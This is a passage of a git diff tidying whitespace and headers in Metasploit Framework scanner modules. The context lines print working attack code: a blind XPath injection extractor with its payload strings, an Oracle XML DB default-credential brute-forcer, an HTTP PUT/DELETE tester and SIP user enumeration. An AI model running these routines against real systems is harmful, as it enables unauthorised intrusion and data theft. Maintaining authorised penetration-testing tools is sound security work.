::Errno::EPIPE end diff --git a/modules/auxiliary/scanner/http/writable.rb b/modules/auxiliary/scanner/http/writable.rb index 0d4d39439b..58d931752a 100644 --- a/modules/auxiliary/scanner/http/writable.rb +++ b/modules/auxiliary/scanner/http/writable.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -14,7 +14,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - + # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WMAPScanDir @@ -39,9 +39,9 @@ class Metasploit3 < Msf::Auxiliary ['PUT'], ['DELETE'] ], - 'DefaultAction' => 'PUT' + 'DefaultAction' => 'PUT' ) - + register_options( [ OptString.new('PATH', [ true, "The path to attempt to write or delete", '/http_write.txt']), @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary target_host = ip target_port = datastore['RPORT'] - + case action.name when 'PUT' begin @@ -67,11 +67,11 @@ class Metasploit3 < Msf::Auxiliary return if not res if (res and res.code >= 200 and res.code < 300) - + # # Detect if file was really uploaded - # - + # + begin res = send_request_cgi({ 'uri' => datastore['PATH'], @@ -80,13 +80,13 @@ class Metasploit3 < Msf::Auxiliary }, 20) return if not res - - tcode = res.code.to_i + + tcode = res.code.to_i if res and (tcode >= 200 and tcode <= 299) if res.body.include? datastore['DATA'] print_status("Upload succeeded on #{wmap_base_url}#{datastore['PATH']} [#{res.code}]") - + report_note( :host => ip, :proto => 'HTTP', @@ -94,23 +94,23 @@ class Metasploit3 < Msf::Auxiliary :type => 'PUT_ENABLED', :data => "#{datastore['PATH']}" ) - + end else print_status("Received a #{tcode} code but upload failed on #{wmap_base_url} [#{res.code} #{res.message}]") end - - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE - end + + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + rescue ::Timeout::Error, ::Errno::EPIPE + end else print_status("Upload failed on #{wmap_base_url} [#{res.code} #{res.message}]") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end - + when 'DELETE' begin res = send_request_cgi({ @@ -121,7 +121,7 @@ class Metasploit3 < Msf::Auxiliary return if not res if (res and res.code >= 200 and res.code < 300) print_status("Delete succeeded on #{wmap_base_url}#{datastore['PATH']} [#{res.code}]") - + report_note( :host => ip, :proto => 'HTTP', @@ -129,14 +129,14 @@ class Metasploit3 < Msf::Auxiliary :type => 'DELETE_ENABLED', :data => "#{datastore['PATH']}" ) - + else print_status("Delete failed on #{wmap_base_url} [#{res.code} #{res.message}]") end rescue ::Rex::ConnectionError - rescue ::Timeout::Error, ::Errno::EPIPE - end + rescue ::Timeout::Error, ::Errno::EPIPE + end end end diff --git a/modules/auxiliary/scanner/http/xpath.rb b/modules/auxiliary/scanner/http/xpath.rb index bd08742a5e..aa9d81381a 100644 --- a/modules/auxiliary/scanner/http/xpath.rb +++ b/modules/auxiliary/scanner/http/xpath.rb @@ -1,6 +1,9 @@ +## +# $Id$ +## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,15 +20,15 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HTTP Blind XPATH 1.0 Injector', 'Description' => %q{ This module exploits blind XPATH 1.0 injections over HTTP GET requests. }, 'Author' => [ 'et [at] metasploit . com' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) - + 'Version' => '$Revision$')) + register_options( [ OptString.new('METHOD', [ true, "HTTP Method",'GET']), @@ -38,46 +41,46 @@ class Metasploit3 < Msf::Auxiliary OptBool.new('MAX_OVER', [ true, "Dont detect result size. Use MAX_LEN instead", true ]), OptBool.new('CHKINJ', [ false, "Check XPath injection with error message", false ]), OptBool.new('DEBUG_INJ', [ false, "Debug XPath injection", true ]) - ], self.class) - + ], self.class) + end - + def wmap_enabled false end def run_host(ip) - + # # Max string len # maxstr = datastore['MAX_LEN'] - + conn = true - + rnum=rand(10000) - + # Weird crap only lower case 'and' operand works truecond = "'%20and%20'#{rnum}'='#{rnum}" - falsecond = "'%20and%20'#{rnum}'='#{rnum+1}" - + falsecond = "'%20and%20'#{rnum}'='#{rnum+1}" + hmeth = datastore['METHOD'] tpath = datastore['PATH'] prequery = datastore['PRE_QUERY'] postquery = datastore['POST_QUERY'] emesg = datastore['ERROR_MSG'] xcomm = datastore['XCOMMAND'] - - - - print_status("Initializing injection.") - + + + + print_status("Initializing injection.") + if datastore['CHKINJ'] - + # # Detect error msg in true condition - # - + # + begin res = send_request_cgi({ 'uri' => tpath, @@ -86,22 +89,22 @@ class Metasploit3 < Msf::Auxiliary }, 20) return if not res - - if res.body.index(emesg) + + if res.body.index(emesg) print_status("False statement check done.") else print_error("Error message not included in false condition.") return end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - conn = false - rescue ::Timeout::Error, ::Errno::EPIPE + conn = false + rescue ::Timeout::Error, ::Errno::EPIPE end - + # # Detect error msg in false condition - # - + # + begin res = send_request_cgi({ 'uri' => tpath, @@ -109,44 +112,44 @@ class Metasploit3 < Msf::Auxiliary 'method' => hmeth }, 20) - return if not res - - if res.body.index(emesg) + return if not res + + if res.body.index(emesg) print_error("Error message included in true condition.") return else print_status("True statement check done.") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - conn = false - rescue ::Timeout::Error, ::Errno::EPIPE - end + conn = false + rescue ::Timeout::Error, ::Errno::EPIPE + end return if not conn - end - + end + # # Find length of command result # low = 1 high = maxstr - + if datastore['MAX_OVER'] print_status("Max. limit set to #{maxstr} characters") reslen = maxstr - else - lenfound = false + else + lenfound = false - while !lenfound do + while !lenfound do middle = (low + high) / 2; - + if datastore['DEBUG_INJ'] - print_status("Lenght Low: #{low} High: #{high} Med: #{middle}") + print_status("Lenght Low: #{low} High: #{high} Med: #{middle}") end - + injlen = "'%20and%20string-length(#{xcomm})=#{middle}%20and%20'#{rnum}'='#{rnum}" - + begin res = send_request_cgi({ 'uri' => tpath, @@ -154,23 +157,23 @@ class Metasploit3 < Msf::Auxiliary 'method' => hmeth }, 20) - return if not res - - if res.body.index(emesg) - lenf = false + return if not res + + if res.body.index(emesg) + lenf = false else lenfound = true lenf = true lens = middle end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - conn = false - rescue ::Timeout::Error, ::Errno::EPIPE + conn = false + rescue ::Timeout::Error, ::Errno::EPIPE end - + if !lenf injlen = "'%20and%20string-length(#{xcomm})<#{middle}%20and%20'#{rnum}'='#{rnum}" - + begin res = send_request_cgi({ 'uri' => tpath, @@ -178,20 +181,20 @@ class Metasploit3 < Msf::Auxiliary 'method' => hmeth }, 20) - return if not res - - if res.body.index(emesg) - low = middle + return if not res + + if res.body.index(emesg) + low = middle else high = middle end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - conn = false - rescue ::Timeout::Error, ::Errno::EPIPE - end + conn = false + rescue ::Timeout::Error, ::Errno::EPIPE + end end - end - + end + print_status("Result size: #{lens}") reslen = lens.to_i end @@ -199,24 +202,24 @@ class Metasploit3 < Msf::Auxiliary # # Execute xpath command and guess response # - - namestr = [] - numchr = 0 - for i in (1..reslen) + namestr = [] + numchr = 0 + + for i in (1..reslen) # # Only alpha range # for k in (32..126) j = "%"+("%x" % k) - - # For Xpath 2.0 Blind search may be performed using a fast binary search using the + + # For Xpath 2.0 Blind search may be performed using a fast binary search using the # string-to-codepoints(string) function - # injlen = "'%20and%20string-to-codepoints(substring(#{xcomm},#{i},1))<#{k}%20and%20'#{rnum}'='#{rnum}" - + # injlen = "'%20and%20string-to-codepoints(substring(#{xcomm},#{i},1))<#{k}%20and%20'#{rnum}'='#{rnum}" + # Basic Blind XPath 1.0 Injection injlen = "'%20and%20substring(#{xcomm},#{i},1)=\"#{j}\"%20and%20'#{rnum}'='#{rnum}" - + begin res = send_request_cgi({ 'uri' => tpath, @@ -224,36 +227,36 @@ class Metasploit3 < Msf::Auxiliary 'method' => hmeth }, 20) - return if not res - - if res.body.index(emesg) - # neeeeext + return if not res + + if res.body.index(emesg) + # neeeeext else if(numchr >= maxstr) # maximum limit reached - print_status("#{xcomm}: #{namestr}") + print_status("#{xcomm}: #{namestr}") print_status("Maximum string length reached.") - return + return end - + numchr+=1 - + comperc = (numchr * 100) / maxstr - + namestr << "#{k.chr}" if datastore['DEBUG_INJ'] print_status("#{comperc}%: '#{k.chr}' #{namestr}") - end + end break end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - conn = false - rescue ::Timeout::Error, ::Errno::EPIPE + conn = false + rescue ::Timeout::Error, ::Errno::EPIPE end end end - - print_status("#{xcomm}: #{namestr}") + + print_status("#{xcomm}: #{namestr}") print_status("Done.") end end diff --git a/modules/auxiliary/scanner/motorola/timbuktu_udp.rb b/modules/auxiliary/scanner/motorola/timbuktu_udp.rb index c937a0ef00..7cce0e8ba1 100644 --- a/modules/auxiliary/scanner/motorola/timbuktu_udp.rb +++ b/modules/auxiliary/scanner/motorola/timbuktu_udp.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary 'Version' => '$Revision$', 'DisclosureDate' => 'Sep 25 2009')) - register_options([Opt::RPORT(407),], self.class) + register_options([Opt::RPORT(407),], self.class) deregister_options('RHOST') end @@ -36,9 +40,9 @@ class Metasploit3 < Msf::Auxiliary ping = "\x00\x25\x00\x22\xFF\x01\x00\x64\x03\x07\x00\x05\x00\x01\x00\x00" udp_sock.write(ping) - + res = udp_sock.read(256) - + if ( res =~ /\x00\x25\xD0\xB9/ ) report_note( :host => ip, @@ -52,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary print_error("Unable to determine info for #{ip}...") end disconnect_udp - rescue ::Errno::EPIPE, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused + rescue ::Errno::EPIPE, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused end end end diff --git a/modules/auxiliary/scanner/mssql/mssql_ping.rb b/modules/auxiliary/scanner/mssql/mssql_ping.rb index c2668dc481..7bce8f8c1a 100644 --- a/modules/auxiliary/scanner/mssql/mssql_ping.rb +++ b/modules/auxiliary/scanner/mssql/mssql_ping.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -14,11 +14,11 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - + include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report - + def initialize super( 'Name' => 'MSSQL Ping Utility', @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary 'Author' => 'MC', 'License' => MSF_LICENSE ) - + deregister_options('RPORT', 'RHOST') end @@ -36,9 +36,9 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - + begin - + info = mssql_ping(2) if (info['ServerName']) print_status("SQL Server information for #{ip}:") @@ -51,7 +51,7 @@ class Metasploit3 < Msf::Auxiliary end - + rescue ::Rex::ConnectionError end end @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary :name => "mssql", :info => mssql_info, :state => mssql_tcp_state - ) + ) end end diff --git a/modules/auxiliary/scanner/mysql/mysql_version.rb b/modules/auxiliary/scanner/mysql/mysql_version.rb index c3fc27fa2c..e10ff3a272 100644 --- a/modules/auxiliary/scanner/mysql/mysql_version.rb +++ b/modules/auxiliary/scanner/mysql/mysql_version.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/auxiliary/scanner/oracle/emc_sid.rb b/modules/auxiliary/scanner/oracle/emc_sid.rb index 31c5b7caf5..a60aecc283 100644 --- a/modules/auxiliary/scanner/oracle/emc_sid.rb +++ b/modules/auxiliary/scanner/oracle/emc_sid.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ @@ -9,7 +13,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - include Msf::Auxiliary::Report + include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -38,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary 'uri' => '/em/console/logon/logon', 'method' => 'GET', }, 5) - + if (res.code == 200) sid = res.body.scan(/Login to Database:(\w+)/) report_note( @@ -53,6 +57,6 @@ class Metasploit3 < Msf::Auxiliary end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE - end + end end end diff --git a/modules/auxiliary/scanner/oracle/sid_enum.rb b/modules/auxiliary/scanner/oracle/sid_enum.rb index 70f111a556..049a0a737a 100644 --- a/modules/auxiliary/scanner/oracle/sid_enum.rb +++ b/modules/auxiliary/scanner/oracle/sid_enum.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -17,8 +21,8 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle SID Enumeration.', 'Description' => %q{ - This module simply queries the TNS listner for the Oracle SID. - With Oracle 9.2.0.8 and above the listener will be protected and + This module simply queries the TNS listner for the Oracle SID. + With Oracle 9.2.0.8 and above the listener will be protected and the SID will have to be bruteforced or guessed. }, 'Author' => [ 'CG', 'MC' ], @@ -26,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary 'Version' => '$Revision$', 'DisclosureDate' => 'Jan 7 2009')) - register_options([Opt::RPORT(1521),], self.class) + register_options([Opt::RPORT(1521),], self.class) deregister_options('RHOST') end @@ -38,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary pkt = tns_packet("(CONNECT_DATA=(COMMAND=STATUS))") sock.put(pkt) - + sleep(0.5) data = sock.get_once diff --git a/modules/auxiliary/scanner/oracle/spy_sid.rb b/modules/auxiliary/scanner/oracle/spy_sid.rb index 76e75bd86e..21df12a169 100644 --- a/modules/auxiliary/scanner/oracle/spy_sid.rb +++ b/modules/auxiliary/scanner/oracle/spy_sid.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ @@ -9,7 +13,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - include Msf::Auxiliary::Report + include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -39,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET', 'version' => '1.1', }, 5) - + if ( res.body =~ /SERVICE_NAME=/ ) sleep(2) sid = res.body.scan(/SERVICE_NAME=([^\)]+)/) diff --git a/modules/auxiliary/scanner/oracle/tnslsnr_version.rb b/modules/auxiliary/scanner/oracle/tnslsnr_version.rb index 28ae9f4046..beb8c5be7f 100644 --- a/modules/auxiliary/scanner/oracle/tnslsnr_version.rb +++ b/modules/auxiliary/scanner/oracle/tnslsnr_version.rb @@ -1,7 +1,8 @@ ## -# # $Id$ -# +## + +## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. @@ -27,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary 'Version' => '$Revision$', 'DisclosureDate' => 'Jan 7 2009')) - register_options([Opt::RPORT(1521),], self.class) + register_options([Opt::RPORT(1521),], self.class) deregister_options('RHOST') end @@ -39,9 +40,9 @@ class Metasploit3 < Msf::Auxiliary pkt = tns_packet("(CONNECT_DATA=(COMMAND=VERSION))") sock.put(pkt) - + sleep(0.5) - + data = sock.get_once if ( data and data =~ /\\*.TNSLSNR for (.*)/ ) diff --git a/modules/auxiliary/scanner/oracle/xdb_sid.rb b/modules/auxiliary/scanner/oracle/xdb_sid.rb index 78db6d58f0..3a744c323a 100644 --- a/modules/auxiliary/scanner/oracle/xdb_sid.rb +++ b/modules/auxiliary/scanner/oracle/xdb_sid.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ @@ -9,7 +13,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - include Msf::Auxiliary::Report + include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -41,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary begin user_pass = "#{datastore['DBUSER']}:#{datastore['DBPASS']}" - + res = send_request_raw({ 'uri' => '/oradb/PUBLIC/GLOBAL_NAME', 'version' => '1.0', @@ -58,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary end if (res.code == 200) - if (not res.body.length > 0) + if (not res.body.length > 0) # sometimes weird bug where body doesn't have value yet res.body = res.bufq end @@ -68,7 +72,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'tcp', :type => 'SERVICE_NAME', :data => "#{sid}" - ) + ) print_status("Discovered SID: '#{sid}' for host #{ip}:#{datastore['RPORT']} with #{datastore['DBUSER']} / #{datastore['DBPASS']}") else print_error("Unable to retrieve SID for #{ip}:#{datastore['RPORT']} with #{datastore['DBUSER']} / #{datastore['DBPASS']}...") diff --git a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb index bcf00be338..b5705903cf 100644 --- a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb +++ b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ @@ -9,7 +13,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - include Msf::Auxiliary::Report + include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -17,7 +21,7 @@ class Metasploit3 < Msf::Auxiliary super( 'Name' => 'Oracle XML DB SID Discovery via Brute Force', 'Description' => %q{ - This module attempts to retrieve the sid from the Oracle XML DB httpd server, + This module attempts to retrieve the sid from the Oracle XML DB httpd server, utilizing Pete Finnigan s default oracle password list. }, 'Version' => '$Revision: 6876 $', @@ -62,7 +66,7 @@ class Metasploit3 < Msf::Auxiliary datastore['DBUSER'] = brute[2].downcase datastore['DBPASS'] = brute[3].downcase user_pass = "#{datastore['DBUSER']}:#{datastore['DBPASS']}" - + res = send_request_raw({ 'uri' => '/oradb/PUBLIC/GLOBAL_NAME', 'version' => '1.0', @@ -78,14 +82,14 @@ class Metasploit3 < Msf::Auxiliary next end if (res.code == 200) - if (not res.body.length > 0) + if (not res.body.length > 0) # sometimes weird bug where body doesn't have value yet res.body = res.bufq end sid = res.body.scan(/<GLOBAL_NAME>(\S+)<\/GLOBAL_NAME>/)[0] report_note(:host => ip, :proto => 'tcp', :type => 'SERVICE_NAME', :data => "#{sid}") print_good("Discovered SID: '#{sid[0]}' for host #{ip}:#{datastore['RPORT']} with #{datastore['DBUSER']} / #{datastore['DBPASS']}") - users.push(user_pass) + users.push(user_pass) elsif(datastore['VERBOSE']) print_error("Unable to retrieve SID for #{ip}:#{datastore['RPORT']} with #{datastore['DBUSER']} / #{datastore['DBPASS']}...") end @@ -108,7 +112,7 @@ class Metasploit3 < Msf::Auxiliary if(res) if(res.code == 200) - if (not res.body.length > 0) + if (not res.body.length > 0) # sometimes weird bug where body doesn't have value yet res.body = res.bufq end @@ -122,7 +126,7 @@ class Metasploit3 < Msf::Auxiliary s = e.elements['STATUS'].get_text report_note(:host => datastore['RHOST'], :proto => 'XDB', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Component Version: #{p}#{v}") print_good("\t#{p}\t\t#{v}\t(#{s})") - + end end end @@ -140,7 +144,7 @@ class Metasploit3 < Msf::Auxiliary if(res) if(res.code == 200) - if (not res.body.length > 0) + if (not res.body.length > 0) # sometimes weird bug where body doesn't have value yet res.body = res.bufq end @@ -169,7 +173,7 @@ class Metasploit3 < Msf::Auxiliary if(res) if(res.code == 200) - if (not res.body.length > 0) + if (not res.body.length > 0) # sometimes weird bug where body doesn't have value yet res.body = res.bufq end @@ -178,7 +182,7 @@ class Metasploit3 < Msf::Auxiliary print_good("Database Link Information ==> as #{u}") doc.elements.each('ALL_DB_LINKS/ROW') do |e| - next if(e.elements['HOST'] == nil or e.elements['USERNAME'] == nil or e.elements['DB_LINK'] == nil) + next if(e.elements['HOST'] == nil or e.elements['USERNAME'] == nil or e.elements['DB_LINK'] == nil) h = e.elements['HOST'].get_text d = e.elements['DB_LINK'].get_text us = e.elements['USERNAME'].get_text @@ -212,7 +216,7 @@ class Metasploit3 < Msf::Auxiliary }, -1) if (res.code == 200) - if (not res.body.length > 0) + if (not res.body.length > 0) # sometimes weird bug where body doesn't have value yet res.body = res.bufq end @@ -248,7 +252,7 @@ class Metasploit3 < Msf::Auxiliary }, -1) if (res.code == 200) - if (not res.body.length > 0) + if (not res.body.length > 0) # sometimes weird bug where body doesn't have value yet res.body = res.bufq end @@ -285,7 +289,7 @@ class Metasploit3 < Msf::Auxiliary end break if good - end # users.each + end # users.each rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE end diff --git a/modules/auxiliary/scanner/portscan/tcp.rb b/modules/auxiliary/scanner/portscan/tcp.rb index 848cc53b08..234179c359 100644 --- a/modules/auxiliary/scanner/portscan/tcp.rb +++ b/modules/auxiliary/scanner/portscan/tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -16,11 +16,11 @@ require 'racket' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp - + include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'TCP Port Scanner', @@ -35,14 +35,14 @@ class Metasploit3 < Msf::Auxiliary OptString.new('PORTS', [true, "Ports to scan (e.g. 22-25,80,110-900)", "1-10000"]), OptInt.new('TIMEOUT', [true, "The socket connect timeout in milliseconds", 1000]) ], self.class) - + deregister_options('RPORT') end - + def run_host(ip) - + timeout = datastore['TIMEOUT'].to_i ports = Rex::Socket.portspec_crack(datastore['PORTS']) diff --git a/modules/auxiliary/scanner/sip/enumerator.rb b/modules/auxiliary/scanner/sip/enumerator.rb index 667b71d3c4..1868d740ab 100644 --- a/modules/auxiliary/scanner/sip/enumerator.rb +++ b/modules/auxiliary/scanner/sip/enumerator.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -13,7 +17,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'SIP username enumerator', @@ -29,11 +33,11 @@ class Metasploit3 < Msf::Auxiliary OptInt.new('MINEXT', [true, 'Starting extension',0]), OptInt.new('MAXEXT', [true, 'Ending extension', 9999]), OptInt.new('PADLEN', [true, 'Cero padding maximum length', 4]), - OptString.new('METHOD', [true, 'Enumeration method to use OPTIONS/REGISTER','REGISTER']), + OptString.new('METHOD', [true, 'Enumeration method to use OPTIONS/REGISTER','REGISTER']), Opt::RPORT(5060), Opt::CHOST, Opt::CPORT(5060) - ], self.class) + ], self.class) end @@ -41,17 +45,17 @@ class Metasploit3 < Msf::Auxiliary def run_batch_size datastore['BATCHSIZE'].to_i end - + # Operate on an entire batch of hosts at once def run_batch(batch) - begin + begin udp_sock = nil idx = 0 - + # Create an unbound UDP socket if no CHOST is specified, otherwise # create a UDP socket bound to CHOST (in order to avail of pivoting) - udp_sock = Rex::Socket::Udp.create( + udp_sock = Rex::Socket::Udp.create( { 'LocalHost' => datastore['CHOST'] || nil, 'LocalPort' => datastore['CPORT'].to_i @@ -60,21 +64,21 @@ class Metasploit3 < Msf::Auxiliary mini = datastore['MINEXT'] maxi = datastore['MAXEXT'] - + batch.each do |ip| for i in (mini..maxi) testext = padnum(i,datastore['PADLEN']) - + case datastore['METHOD'] when 'REGISTER' data = create_probe(ip,testext,'REGISTER') - when 'OPTIONS' + when 'OPTIONS' data = create_probe(ip,testext,'OPTIONS') else print_error("Method not found.") - return + return end - + begin udp_sock.sendto(data, ip, datastore['RPORT'].to_i, 0) @@ -97,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary while (r = udp_sock.recvfrom(65535, 3) and r[1]) parse_reply(r,datastore['METHOD']) end - + rescue ::Interrupt raise $! rescue ::Exception => e @@ -113,29 +117,29 @@ class Metasploit3 < Msf::Auxiliary def parse_reply(pkt,meth) return if not pkt[1] - + if(pkt[1] =~ /^::ffff:/) pkt[1] = pkt[1].sub(/^::ffff:/, '') end resp = pkt[0].split(/\s+/)[1] - repcode = '' + repcode = '' agent = '' verbs = '' serv = '' - prox = '' - + prox = '' + if(pkt[0] =~ /^To\:\s*(.*)$/i) testn = "#{$1.strip}".split(';')[0] end - + case resp.to_i - when 401 + when 401 print_status("Found user: #{testn} [Auth]") - when 200 + when 200 print_status("Found user: #{testn} [Open]") else - #print_error("Undefined error code: #{resp.to_i}" + #print_error("Undefined error code: #{resp.to_i}" end end @@ -156,10 +160,10 @@ class Metasploit3 < Msf::Auxiliary data << "User-Agent: #{suser}\r\n" data << "Accept: text/plain\r\n" end - + def padnum(num,padding) - if padding >= num.to_s.length + if padding >= num.to_s.length ('0'*(padding-num.to_s.length)) << num.to_s - end - end + end + end end diff --git a/modules/auxiliary/scanner/sip/options.rb b/modules/auxiliary/scanner/sip/options.rb index 68b886949e..9b7967126c 100644 --- a/modules/auxiliary/scanner/sip/options.rb +++ b/modules/auxiliary/scanner/sip/options.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,7 +17,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'SIP Endpoint Scanner', @@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary Opt::RPORT(5060), Opt::CHOST, Opt::CPORT(5060) - ], self.class) + ], self.class) end @@ -42,14 +42,14 @@ class Metasploit3 < Msf::Auxiliary def run_batch_size datastore['BATCHSIZE'].to_i end - + # Operate on an entire batch of hosts at once def run_batch(batch) - begin + begin udp_sock = nil idx = 0 - + # Create an unbound UDP socket if no CHOST is specified, otherwise # create a UDP socket bound to CHOST (in order to avail of pivoting) udp_sock = Rex::Socket::Udp.create( @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary while (r = udp_sock.recvfrom(65535, 3) and r[1]) parse_reply(r) end - + rescue ::Interrupt raise $! rescue ::Exception => e @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary def parse_reply(pkt) return if not pkt[1] - + if(pkt[1] =~ /^::ffff:/) pkt[1] = pkt[1].sub(/^::ffff:/, '') end @@ -108,15 +108,15 @@ class Metasploit3 < Msf::Auxiliary verbs = '' serv = '' prox = '' - + if(pkt[0] =~ /^User-Agent:\s*(.*)$/i) agent = "agent='#{$1.strip}' " end - + if(pkt[0] =~ /^Allow:\s+(.*)$/i) verbs = "verbs='#{$1.strip}' " end - + if(pkt[0] =~ /^Server:\s+(.*)$/) serv = "server='#{$1.strip}' " end @@ -124,16 +124,16 @@ class Metasploit3 < Msf::Auxiliary if(pkt[0] =~ /^Proxy-Require:\s+(.*)$/) serv = "proxy-required='#{$1.strip}' " end - + print_status("#{pkt[1]} #{resp} #{agent}#{serv}#{prox}#{verbs}") report_service( :host => pkt[1], :port => pkt[2], :proto => 'udp', - :name => 'sip' + :name => 'sip' ) - + if(not agent.empty?) 